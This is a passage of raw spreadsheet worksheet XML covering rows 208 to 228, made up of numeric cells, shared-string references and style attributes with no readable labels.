      </c>
      <c r="J208" s="17"/>
      <c r="K208" s="17"/>
      <c r="L208" s="17"/>
      <c r="M208" s="17"/>
      <c r="N208" s="17"/>
      <c r="O208" s="4" t="s">
        <v>711</v>
      </c>
      <c r="P208" s="4" t="s">
        <v>712</v>
      </c>
      <c r="Q208" s="6">
        <v>5060630.0</v>
      </c>
      <c r="R208" s="7"/>
      <c r="S208" s="7"/>
      <c r="T208" s="7"/>
      <c r="U208" s="8"/>
      <c r="V208" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W208" s="2" t="s">
        <v>713</v>
      </c>
      <c r="X208" s="6">
        <v>2.0</v>
      </c>
      <c r="Y208" s="6">
        <v>0.0</v>
      </c>
      <c r="Z208" s="6">
        <v>0.0</v>
      </c>
      <c r="AA208" s="7"/>
      <c r="AB208" s="7"/>
      <c r="AC208" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE208" s="8"/>
      <c r="AF208" s="15"/>
    </row>
    <row r="209">
      <c r="A209" s="6">
        <f t="shared" si="1"/>
        <v>0.3448838477</v>
      </c>
      <c r="B209" s="6">
        <v>3057814.0</v>
      </c>
      <c r="C209" s="6">
        <v>1.0</v>
      </c>
      <c r="D209" s="6">
        <v>3058304.0</v>
      </c>
      <c r="E209" s="8"/>
      <c r="F209" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G209" s="8"/>
      <c r="H209" s="6">
        <v>0.0</v>
      </c>
      <c r="I209" s="6">
        <v>446.0</v>
      </c>
      <c r="J209" s="20"/>
      <c r="K209" s="20"/>
      <c r="L209" s="20"/>
      <c r="M209" s="20"/>
      <c r="N209" s="20"/>
      <c r="O209" s="4" t="s">
        <v>714</v>
      </c>
      <c r="P209" s="4" t="s">
        <v>715</v>
      </c>
      <c r="Q209" s="6">
        <v>368575.0</v>
      </c>
      <c r="R209" s="8"/>
      <c r="S209" s="8"/>
      <c r="T209" s="8"/>
      <c r="U209" s="8"/>
      <c r="V209" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W209" s="2" t="s">
        <v>716</v>
      </c>
      <c r="X209" s="6">
        <v>2.0</v>
      </c>
      <c r="Y209" s="6">
        <v>0.0</v>
      </c>
      <c r="Z209" s="8"/>
      <c r="AA209" s="8"/>
      <c r="AB209" s="8"/>
      <c r="AC209" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE209" s="8"/>
      <c r="AF209" s="14"/>
    </row>
    <row r="210">
      <c r="A210" s="6">
        <f t="shared" si="1"/>
        <v>0.03603035926</v>
      </c>
      <c r="B210" s="6">
        <v>2.4510098E7</v>
      </c>
      <c r="C210" s="6">
        <v>1.0</v>
      </c>
      <c r="D210" s="6">
        <v>2.5145313E7</v>
      </c>
      <c r="E210" s="8"/>
      <c r="F210" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G210" s="8"/>
      <c r="H210" s="6">
        <v>2.0</v>
      </c>
      <c r="I210" s="6">
        <v>224.0</v>
      </c>
      <c r="J210" s="20"/>
      <c r="K210" s="20"/>
      <c r="L210" s="20"/>
      <c r="M210" s="20"/>
      <c r="N210" s="20"/>
      <c r="O210" s="4" t="s">
        <v>717</v>
      </c>
      <c r="P210" s="4" t="s">
        <v>718</v>
      </c>
      <c r="Q210" s="6">
        <v>1249829.0</v>
      </c>
      <c r="R210" s="8"/>
      <c r="S210" s="6">
        <v>1249829.0</v>
      </c>
      <c r="T210" s="8"/>
      <c r="U210" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V210" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W210" s="2" t="s">
        <v>719</v>
      </c>
      <c r="X210" s="6">
        <v>1.0</v>
      </c>
      <c r="Y210" s="6">
        <v>6.0</v>
      </c>
      <c r="Z210" s="8"/>
      <c r="AA210" s="8"/>
      <c r="AB210" s="8"/>
      <c r="AC210" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE210" s="8"/>
      <c r="AF210" s="14"/>
    </row>
    <row r="211">
      <c r="A211" s="6">
        <f t="shared" si="1"/>
        <v>0.9961721847</v>
      </c>
      <c r="B211" s="6">
        <v>243957.0</v>
      </c>
      <c r="C211" s="6">
        <v>1.0</v>
      </c>
      <c r="D211" s="6">
        <v>244240.0</v>
      </c>
      <c r="E211" s="8"/>
      <c r="F211" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G211" s="8"/>
      <c r="H211" s="6">
        <v>21.0</v>
      </c>
      <c r="I211" s="6">
        <v>18150.0</v>
      </c>
      <c r="J211" s="17"/>
      <c r="K211" s="17"/>
      <c r="L211" s="17"/>
      <c r="M211" s="17"/>
      <c r="N211" s="17"/>
      <c r="O211" s="4" t="s">
        <v>720</v>
      </c>
      <c r="P211" s="4" t="s">
        <v>721</v>
      </c>
      <c r="Q211" s="6">
        <v>18986.0</v>
      </c>
      <c r="R211" s="2" t="s">
        <v>722</v>
      </c>
      <c r="S211" s="7"/>
      <c r="T211" s="7"/>
      <c r="U211" s="8"/>
      <c r="V211" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W211" s="2" t="s">
        <v>723</v>
      </c>
      <c r="X211" s="6">
        <v>12.0</v>
      </c>
      <c r="Y211" s="6">
        <v>1.0</v>
      </c>
      <c r="Z211" s="6">
        <v>0.0</v>
      </c>
      <c r="AA211" s="7"/>
      <c r="AB211" s="7"/>
      <c r="AC211" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE211" s="8"/>
      <c r="AF211" s="15"/>
    </row>
    <row r="212">
      <c r="A212" s="6">
        <f t="shared" si="1"/>
        <v>0.4327045276</v>
      </c>
      <c r="B212" s="6">
        <v>6.0313742E7</v>
      </c>
      <c r="C212" s="6">
        <v>1.0</v>
      </c>
      <c r="D212" s="7"/>
      <c r="E212" s="8"/>
      <c r="F212" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G212" s="8"/>
      <c r="H212" s="6">
        <v>1.0</v>
      </c>
      <c r="I212" s="6">
        <v>174.0</v>
      </c>
      <c r="J212" s="17"/>
      <c r="K212" s="17"/>
      <c r="L212" s="17"/>
      <c r="M212" s="17"/>
      <c r="N212" s="17"/>
      <c r="O212" s="4" t="s">
        <v>724</v>
      </c>
      <c r="P212" s="4" t="s">
        <v>725</v>
      </c>
      <c r="Q212" s="6">
        <v>1.2930087E7</v>
      </c>
      <c r="R212" s="7"/>
      <c r="S212" s="6">
        <v>8404453.0</v>
      </c>
      <c r="T212" s="7"/>
      <c r="U212" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V212" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W212" s="2" t="s">
        <v>726</v>
      </c>
      <c r="X212" s="6">
        <v>0.0</v>
      </c>
      <c r="Y212" s="6">
        <v>1.0</v>
      </c>
      <c r="Z212" s="7"/>
      <c r="AA212" s="7"/>
      <c r="AB212" s="7"/>
      <c r="AC212" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE212" s="8"/>
      <c r="AF212" s="15"/>
    </row>
    <row r="213">
      <c r="A213" s="6">
        <f t="shared" si="1"/>
        <v>0.02061227435</v>
      </c>
      <c r="B213" s="6">
        <v>1.3055373E7</v>
      </c>
      <c r="C213" s="6">
        <v>1.0</v>
      </c>
      <c r="D213" s="6">
        <v>1.3055492E7</v>
      </c>
      <c r="E213" s="8"/>
      <c r="F213" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G213" s="8"/>
      <c r="H213" s="6">
        <v>0.0</v>
      </c>
      <c r="I213" s="6">
        <v>1610.0</v>
      </c>
      <c r="J213" s="20"/>
      <c r="K213" s="20"/>
      <c r="L213" s="20"/>
      <c r="M213" s="20"/>
      <c r="N213" s="20"/>
      <c r="O213" s="4" t="s">
        <v>727</v>
      </c>
      <c r="P213" s="4" t="s">
        <v>728</v>
      </c>
      <c r="Q213" s="6">
        <v>1549273.0</v>
      </c>
      <c r="R213" s="8"/>
      <c r="S213" s="8"/>
      <c r="T213" s="8"/>
      <c r="U213" s="8"/>
      <c r="V213" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W213" s="2" t="s">
        <v>729</v>
      </c>
      <c r="X213" s="6">
        <v>1.0</v>
      </c>
      <c r="Y213" s="6">
        <v>2.0</v>
      </c>
      <c r="Z213" s="8"/>
      <c r="AA213" s="8"/>
      <c r="AB213" s="8"/>
      <c r="AC213" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE213" s="8"/>
      <c r="AF213" s="14"/>
    </row>
    <row r="214">
      <c r="A214" s="6">
        <f t="shared" si="1"/>
        <v>0.004037378249</v>
      </c>
      <c r="B214" s="6">
        <v>5.2749148E7</v>
      </c>
      <c r="C214" s="6">
        <v>1.0</v>
      </c>
      <c r="D214" s="8"/>
      <c r="E214" s="8"/>
      <c r="F214" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G214" s="8"/>
      <c r="H214" s="6">
        <v>0.0</v>
      </c>
      <c r="I214" s="6">
        <v>445.0</v>
      </c>
      <c r="J214" s="20"/>
      <c r="K214" s="20"/>
      <c r="L214" s="20"/>
      <c r="M214" s="20"/>
      <c r="N214" s="20"/>
      <c r="O214" s="4" t="s">
        <v>730</v>
      </c>
      <c r="P214" s="4" t="s">
        <v>731</v>
      </c>
      <c r="Q214" s="6">
        <v>9380904.0</v>
      </c>
      <c r="R214" s="8"/>
      <c r="S214" s="8"/>
      <c r="T214" s="8"/>
      <c r="U214" s="8"/>
      <c r="V214" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W214" s="2" t="s">
        <v>732</v>
      </c>
      <c r="X214" s="6">
        <v>1.0</v>
      </c>
      <c r="Y214" s="6">
        <v>4.0</v>
      </c>
      <c r="Z214" s="8"/>
      <c r="AA214" s="8"/>
      <c r="AB214" s="8"/>
      <c r="AC214" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE214" s="8"/>
      <c r="AF214" s="14"/>
    </row>
    <row r="215">
      <c r="A215" s="6">
        <f t="shared" si="1"/>
        <v>0.2552761144</v>
      </c>
      <c r="B215" s="6">
        <v>7.3493421E7</v>
      </c>
      <c r="C215" s="6">
        <v>1.0</v>
      </c>
      <c r="D215" s="8"/>
      <c r="E215" s="8"/>
      <c r="F215" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G215" s="8"/>
      <c r="H215" s="6">
        <v>2.0</v>
      </c>
      <c r="I215" s="6">
        <v>325.0</v>
      </c>
      <c r="J215" s="20"/>
      <c r="K215" s="20"/>
      <c r="L215" s="20"/>
      <c r="M215" s="20"/>
      <c r="N215" s="20"/>
      <c r="O215" s="4" t="s">
        <v>733</v>
      </c>
      <c r="P215" s="4" t="s">
        <v>734</v>
      </c>
      <c r="Q215" s="6">
        <v>1.4400198E7</v>
      </c>
      <c r="R215" s="8"/>
      <c r="S215" s="8"/>
      <c r="T215" s="8"/>
      <c r="U215" s="8"/>
      <c r="V215" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W215" s="2" t="s">
        <v>735</v>
      </c>
      <c r="X215" s="6">
        <v>1.0</v>
      </c>
      <c r="Y215" s="6">
        <v>0.0</v>
      </c>
      <c r="Z215" s="8"/>
      <c r="AA215" s="8"/>
      <c r="AB215" s="8"/>
      <c r="AC215" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE215" s="8"/>
      <c r="AF215" s="14"/>
    </row>
    <row r="216">
      <c r="A216" s="6">
        <f t="shared" si="1"/>
        <v>0.9324846443</v>
      </c>
      <c r="B216" s="6">
        <v>6.2738751E7</v>
      </c>
      <c r="C216" s="6">
        <v>1.0</v>
      </c>
      <c r="D216" s="8"/>
      <c r="E216" s="8"/>
      <c r="F216" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G216" s="8"/>
      <c r="H216" s="6">
        <v>2.0</v>
      </c>
      <c r="I216" s="6">
        <v>126.0</v>
      </c>
      <c r="J216" s="20"/>
      <c r="K216" s="20"/>
      <c r="L216" s="20"/>
      <c r="M216" s="20"/>
      <c r="N216" s="20"/>
      <c r="O216" s="4" t="s">
        <v>736</v>
      </c>
      <c r="P216" s="4" t="s">
        <v>737</v>
      </c>
      <c r="Q216" s="6">
        <v>645225.0</v>
      </c>
      <c r="R216" s="8"/>
      <c r="S216" s="6">
        <v>645225.0</v>
      </c>
      <c r="T216" s="8"/>
      <c r="U216" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V216" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W216" s="2" t="s">
        <v>738</v>
      </c>
      <c r="X216" s="6">
        <v>1.0</v>
      </c>
      <c r="Y216" s="6">
        <v>2.0</v>
      </c>
      <c r="Z216" s="8"/>
      <c r="AA216" s="8"/>
      <c r="AB216" s="8"/>
      <c r="AC216" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE216" s="8"/>
      <c r="AF216" s="14"/>
    </row>
    <row r="217">
      <c r="A217" s="6">
        <f t="shared" si="1"/>
        <v>0.5207177472</v>
      </c>
      <c r="B217" s="6">
        <v>2846244.0</v>
      </c>
      <c r="C217" s="6">
        <v>1.0</v>
      </c>
      <c r="D217" s="6">
        <v>2846252.0</v>
      </c>
      <c r="E217" s="8"/>
      <c r="F217" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G217" s="8"/>
      <c r="H217" s="6">
        <v>7.0</v>
      </c>
      <c r="I217" s="6">
        <v>4431.0</v>
      </c>
      <c r="J217" s="17"/>
      <c r="K217" s="17"/>
      <c r="L217" s="17"/>
      <c r="M217" s="17"/>
      <c r="N217" s="17"/>
      <c r="O217" s="4" t="s">
        <v>739</v>
      </c>
      <c r="P217" s="4" t="s">
        <v>740</v>
      </c>
      <c r="Q217" s="6">
        <v>162381.0</v>
      </c>
      <c r="R217" s="7"/>
      <c r="S217" s="7"/>
      <c r="T217" s="7"/>
      <c r="U217" s="8"/>
      <c r="V217" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W217" s="2" t="s">
        <v>488</v>
      </c>
      <c r="X217" s="6">
        <v>8.0</v>
      </c>
      <c r="Y217" s="6">
        <v>4.0</v>
      </c>
      <c r="Z217" s="7"/>
      <c r="AA217" s="7"/>
      <c r="AB217" s="7"/>
      <c r="AC217" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE217" s="8"/>
      <c r="AF217" s="15"/>
    </row>
    <row r="218">
      <c r="A218" s="6">
        <f t="shared" si="1"/>
        <v>0.902948623</v>
      </c>
      <c r="B218" s="6">
        <v>6.0169396E7</v>
      </c>
      <c r="C218" s="6">
        <v>1.0</v>
      </c>
      <c r="D218" s="7"/>
      <c r="E218" s="8"/>
      <c r="F218" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G218" s="8"/>
      <c r="H218" s="6">
        <v>0.0</v>
      </c>
      <c r="I218" s="6">
        <v>170.0</v>
      </c>
      <c r="J218" s="17"/>
      <c r="K218" s="17"/>
      <c r="L218" s="17"/>
      <c r="M218" s="17"/>
      <c r="N218" s="17"/>
      <c r="O218" s="4" t="s">
        <v>741</v>
      </c>
      <c r="P218" s="4" t="s">
        <v>742</v>
      </c>
      <c r="Q218" s="6">
        <v>3245518.0</v>
      </c>
      <c r="R218" s="7"/>
      <c r="S218" s="7"/>
      <c r="T218" s="7"/>
      <c r="U218" s="8"/>
      <c r="V218" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W218" s="2" t="s">
        <v>743</v>
      </c>
      <c r="X218" s="6">
        <v>1.0</v>
      </c>
      <c r="Y218" s="6">
        <v>0.0</v>
      </c>
      <c r="Z218" s="7"/>
      <c r="AA218" s="7"/>
      <c r="AB218" s="7"/>
      <c r="AC218" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE218" s="8"/>
      <c r="AF218" s="15"/>
    </row>
    <row r="219">
      <c r="A219" s="6">
        <f t="shared" si="1"/>
        <v>0.9918379741</v>
      </c>
      <c r="B219" s="6">
        <v>1.81482E7</v>
      </c>
      <c r="C219" s="6">
        <v>1.0</v>
      </c>
      <c r="D219" s="6">
        <v>1.8148423E7</v>
      </c>
      <c r="E219" s="8"/>
      <c r="F219" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G219" s="8"/>
      <c r="H219" s="6">
        <v>0.0</v>
      </c>
      <c r="I219" s="6">
        <v>295.0</v>
      </c>
      <c r="J219" s="17"/>
      <c r="K219" s="17"/>
      <c r="L219" s="17"/>
      <c r="M219" s="17"/>
      <c r="N219" s="17"/>
      <c r="O219" s="4" t="s">
        <v>744</v>
      </c>
      <c r="P219" s="4" t="s">
        <v>745</v>
      </c>
      <c r="Q219" s="6">
        <v>641455.0</v>
      </c>
      <c r="R219" s="7"/>
      <c r="S219" s="6">
        <v>-1.0</v>
      </c>
      <c r="T219" s="7"/>
      <c r="U219" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V219" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W219" s="2" t="s">
        <v>746</v>
      </c>
      <c r="X219" s="6">
        <v>1.0</v>
      </c>
      <c r="Y219" s="6">
        <v>0.0</v>
      </c>
      <c r="Z219" s="7"/>
      <c r="AA219" s="7"/>
      <c r="AB219" s="7"/>
      <c r="AC219" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE219" s="8"/>
      <c r="AF219" s="15"/>
    </row>
    <row r="220">
      <c r="A220" s="6">
        <f t="shared" si="1"/>
        <v>0.9788011091</v>
      </c>
      <c r="B220" s="6">
        <v>7.29821E7</v>
      </c>
      <c r="C220" s="6">
        <v>1.0</v>
      </c>
      <c r="D220" s="8"/>
      <c r="E220" s="8"/>
      <c r="F220" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G220" s="8"/>
      <c r="H220" s="6">
        <v>-1.0</v>
      </c>
      <c r="I220" s="6">
        <v>903.0</v>
      </c>
      <c r="J220" s="20"/>
      <c r="K220" s="20"/>
      <c r="L220" s="20"/>
      <c r="M220" s="20"/>
      <c r="N220" s="20"/>
      <c r="O220" s="4" t="s">
        <v>747</v>
      </c>
      <c r="P220" s="4" t="s">
        <v>748</v>
      </c>
      <c r="Q220" s="6">
        <v>1.955011E7</v>
      </c>
      <c r="R220" s="8"/>
      <c r="S220" s="6">
        <v>3744182.0</v>
      </c>
      <c r="T220" s="8"/>
      <c r="U220" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V220" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W220" s="2" t="s">
        <v>749</v>
      </c>
      <c r="X220" s="6">
        <v>1.0</v>
      </c>
      <c r="Y220" s="6">
        <v>1.0</v>
      </c>
      <c r="Z220" s="8"/>
      <c r="AA220" s="8"/>
      <c r="AB220" s="8"/>
      <c r="AC220" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE220" s="8"/>
      <c r="AF220" s="14"/>
    </row>
    <row r="221">
      <c r="A221" s="6">
        <f t="shared" si="1"/>
        <v>0.5549471838</v>
      </c>
      <c r="B221" s="6">
        <v>6.8062958E7</v>
      </c>
      <c r="C221" s="6">
        <v>1.0</v>
      </c>
      <c r="D221" s="6">
        <v>6.8071941E7</v>
      </c>
      <c r="E221" s="8"/>
      <c r="F221" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G221" s="8"/>
      <c r="H221" s="6">
        <v>-3.0</v>
      </c>
      <c r="I221" s="6">
        <v>57.0</v>
      </c>
      <c r="J221" s="20"/>
      <c r="K221" s="20"/>
      <c r="L221" s="20"/>
      <c r="M221" s="20"/>
      <c r="N221" s="20"/>
      <c r="O221" s="4" t="s">
        <v>750</v>
      </c>
      <c r="P221" s="4" t="s">
        <v>751</v>
      </c>
      <c r="Q221" s="6">
        <v>1.4889323E7</v>
      </c>
      <c r="R221" s="8"/>
      <c r="S221" s="8"/>
      <c r="T221" s="8"/>
      <c r="U221" s="8"/>
      <c r="V221" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W221" s="2" t="s">
        <v>752</v>
      </c>
      <c r="X221" s="6">
        <v>1.0</v>
      </c>
      <c r="Y221" s="6">
        <v>1.0</v>
      </c>
      <c r="Z221" s="8"/>
      <c r="AA221" s="8"/>
      <c r="AB221" s="8"/>
      <c r="AC221" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE221" s="8"/>
      <c r="AF221" s="14"/>
    </row>
    <row r="222">
      <c r="A222" s="6">
        <f t="shared" si="1"/>
        <v>0.539546367</v>
      </c>
      <c r="B222" s="6">
        <v>6.9144646E7</v>
      </c>
      <c r="C222" s="6">
        <v>1.0</v>
      </c>
      <c r="D222" s="7"/>
      <c r="E222" s="8"/>
      <c r="F222" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G222" s="8"/>
      <c r="H222" s="6">
        <v>3.0</v>
      </c>
      <c r="I222" s="6">
        <v>247.0</v>
      </c>
      <c r="J222" s="17"/>
      <c r="K222" s="17"/>
      <c r="L222" s="17"/>
      <c r="M222" s="17"/>
      <c r="N222" s="17"/>
      <c r="O222" s="4" t="s">
        <v>753</v>
      </c>
      <c r="P222" s="4" t="s">
        <v>754</v>
      </c>
      <c r="Q222" s="6">
        <v>1.6887258E7</v>
      </c>
      <c r="R222" s="7"/>
      <c r="S222" s="6">
        <v>13302.0</v>
      </c>
      <c r="T222" s="7"/>
      <c r="U222" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V222" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W222" s="2" t="s">
        <v>603</v>
      </c>
      <c r="X222" s="6">
        <v>2.0</v>
      </c>
      <c r="Y222" s="6">
        <v>0.0</v>
      </c>
      <c r="Z222" s="7"/>
      <c r="AA222" s="7"/>
      <c r="AB222" s="7"/>
      <c r="AC222" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE222" s="8"/>
      <c r="AF222" s="15"/>
    </row>
    <row r="223">
      <c r="A223" s="6">
        <f t="shared" si="1"/>
        <v>0.02928239943</v>
      </c>
      <c r="B223" s="6">
        <v>5.358408E7</v>
      </c>
      <c r="C223" s="6">
        <v>1.0</v>
      </c>
      <c r="D223" s="8"/>
      <c r="E223" s="8"/>
      <c r="F223" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G223" s="8"/>
      <c r="H223" s="6">
        <v>0.0</v>
      </c>
      <c r="I223" s="6">
        <v>465.0</v>
      </c>
      <c r="J223" s="17"/>
      <c r="K223" s="17"/>
      <c r="L223" s="17"/>
      <c r="M223" s="17"/>
      <c r="N223" s="17"/>
      <c r="O223" s="4" t="s">
        <v>755</v>
      </c>
      <c r="P223" s="4" t="s">
        <v>756</v>
      </c>
      <c r="Q223" s="6">
        <v>9961101.0</v>
      </c>
      <c r="R223" s="7"/>
      <c r="S223" s="6">
        <v>9961101.0</v>
      </c>
      <c r="T223" s="7"/>
      <c r="U223" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V223" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W223" s="2" t="s">
        <v>757</v>
      </c>
      <c r="X223" s="6">
        <v>1.0</v>
      </c>
      <c r="Y223" s="6">
        <v>1.0</v>
      </c>
      <c r="Z223" s="7"/>
      <c r="AA223" s="7"/>
      <c r="AB223" s="7"/>
      <c r="AC223" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE223" s="8"/>
      <c r="AF223" s="15"/>
    </row>
    <row r="224">
      <c r="A224" s="6">
        <f t="shared" si="1"/>
        <v>0.3325841756</v>
      </c>
      <c r="B224" s="6">
        <v>1.1538596E7</v>
      </c>
      <c r="C224" s="6">
        <v>1.0</v>
      </c>
      <c r="D224" s="6">
        <v>1.1538856E7</v>
      </c>
      <c r="E224" s="8"/>
      <c r="F224" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G224" s="8"/>
      <c r="H224" s="6">
        <v>1.0</v>
      </c>
      <c r="I224" s="6">
        <v>139.0</v>
      </c>
      <c r="J224" s="20"/>
      <c r="K224" s="20"/>
      <c r="L224" s="20"/>
      <c r="M224" s="20"/>
      <c r="N224" s="20"/>
      <c r="O224" s="4" t="s">
        <v>758</v>
      </c>
      <c r="P224" s="4" t="s">
        <v>759</v>
      </c>
      <c r="Q224" s="6">
        <v>625540.0</v>
      </c>
      <c r="R224" s="8"/>
      <c r="S224" s="8"/>
      <c r="T224" s="8"/>
      <c r="U224" s="8"/>
      <c r="V224" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W224" s="2" t="s">
        <v>760</v>
      </c>
      <c r="X224" s="6">
        <v>1.0</v>
      </c>
      <c r="Y224" s="6">
        <v>0.0</v>
      </c>
      <c r="Z224" s="6">
        <v>0.0</v>
      </c>
      <c r="AA224" s="8"/>
      <c r="AB224" s="8"/>
      <c r="AC224" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE224" s="8"/>
      <c r="AF224" s="14"/>
    </row>
    <row r="225">
      <c r="A225" s="6">
        <f t="shared" si="1"/>
        <v>0.5587590153</v>
      </c>
      <c r="B225" s="6">
        <v>7.3722018E7</v>
      </c>
      <c r="C225" s="6">
        <v>1.0</v>
      </c>
      <c r="D225" s="8"/>
      <c r="E225" s="8"/>
      <c r="F225" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G225" s="8"/>
      <c r="H225" s="6">
        <v>0.0</v>
      </c>
      <c r="I225" s="6">
        <v>402.0</v>
      </c>
      <c r="J225" s="20"/>
      <c r="K225" s="20"/>
      <c r="L225" s="20"/>
      <c r="M225" s="20"/>
      <c r="N225" s="20"/>
      <c r="O225" s="4" t="s">
        <v>761</v>
      </c>
      <c r="P225" s="4" t="s">
        <v>762</v>
      </c>
      <c r="Q225" s="6">
        <v>1.8336317E7</v>
      </c>
      <c r="R225" s="8"/>
      <c r="S225" s="6">
        <v>5389997.0</v>
      </c>
      <c r="T225" s="8"/>
      <c r="U225" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V225" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W225" s="2" t="s">
        <v>763</v>
      </c>
      <c r="X225" s="6">
        <v>0.0</v>
      </c>
      <c r="Y225" s="6">
        <v>1.0</v>
      </c>
      <c r="Z225" s="8"/>
      <c r="AA225" s="8"/>
      <c r="AB225" s="8"/>
      <c r="AC225" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE225" s="8"/>
      <c r="AF225" s="14"/>
    </row>
    <row r="226">
      <c r="A226" s="6">
        <f t="shared" si="1"/>
        <v>0.04450286955</v>
      </c>
      <c r="B226" s="6">
        <v>5092376.0</v>
      </c>
      <c r="C226" s="6">
        <v>1.0</v>
      </c>
      <c r="D226" s="6">
        <v>5092441.0</v>
      </c>
      <c r="E226" s="8"/>
      <c r="F226" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G226" s="8"/>
      <c r="H226" s="6">
        <v>0.0</v>
      </c>
      <c r="I226" s="6">
        <v>478.0</v>
      </c>
      <c r="J226" s="20"/>
      <c r="K226" s="20"/>
      <c r="L226" s="20"/>
      <c r="M226" s="20"/>
      <c r="N226" s="20"/>
      <c r="O226" s="4" t="s">
        <v>764</v>
      </c>
      <c r="P226" s="4" t="s">
        <v>765</v>
      </c>
      <c r="Q226" s="6">
        <v>316233.0</v>
      </c>
      <c r="R226" s="8"/>
      <c r="S226" s="6">
        <v>128165.0</v>
      </c>
      <c r="T226" s="8"/>
      <c r="U226" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V226" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W226" s="2" t="s">
        <v>766</v>
      </c>
      <c r="X226" s="6">
        <v>2.0</v>
      </c>
      <c r="Y226" s="6">
        <v>4.0</v>
      </c>
      <c r="Z226" s="8"/>
      <c r="AA226" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AB226" s="8"/>
      <c r="AC226" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE226" s="8"/>
      <c r="AF226" s="14"/>
    </row>
    <row r="227">
      <c r="A227" s="6">
        <f t="shared" si="1"/>
        <v>0.1451166329</v>
      </c>
      <c r="B227" s="6">
        <v>5.0347616E7</v>
      </c>
      <c r="C227" s="6">
        <v>1.0</v>
      </c>
      <c r="D227" s="8"/>
      <c r="E227" s="8"/>
      <c r="F227" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G227" s="8"/>
      <c r="H227" s="6">
        <v>2.0</v>
      </c>
      <c r="I227" s="6">
        <v>3550.0</v>
      </c>
      <c r="J227" s="17"/>
      <c r="K227" s="17"/>
      <c r="L227" s="17"/>
      <c r="M227" s="17"/>
      <c r="N227" s="17"/>
      <c r="O227" s="4" t="s">
        <v>767</v>
      </c>
      <c r="P227" s="4" t="s">
        <v>768</v>
      </c>
      <c r="Q227" s="6">
        <v>8612185.0</v>
      </c>
      <c r="R227" s="7"/>
      <c r="S227" s="6">
        <v>8612185.0</v>
      </c>
      <c r="T227" s="7"/>
      <c r="U227" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V227" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W227" s="2" t="s">
        <v>769</v>
      </c>
      <c r="X227" s="6">
        <v>4.0</v>
      </c>
      <c r="Y227" s="6">
        <v>0.0</v>
      </c>
      <c r="Z227" s="6">
        <v>0.0</v>
      </c>
      <c r="AA227" s="7"/>
      <c r="AB227" s="7"/>
      <c r="AC227" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE227" s="8"/>
      <c r="AF227" s="15"/>
    </row>
    <row r="228">
      <c r="A228" s="6">
        <f t="shared" si="1"/>
        <v>0.03122317479</v>
      </c>
      <c r="B228" s="6">
        <v>7.6190131E7</v>
      </c>
      <c r="C228" s="6">
        <v>1.0</v>
      </c>
      <c r="D228" s="8"/>
      <c r="E228" s="8"/>
      <c r="F228" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G228" s="8"/>
      <c r="H228" s="6">
        <v>0.0</v>
      </c>
      <c r="I228" s="6">
        <v>35.0</v>
      </c>
      <c r="J228" s="20"/>
      <c r="K228" s="20"/>
      <c r="L228" s="20"/>
      <c r="M228" s="20"/>
      <c r="N228" s="20"/>
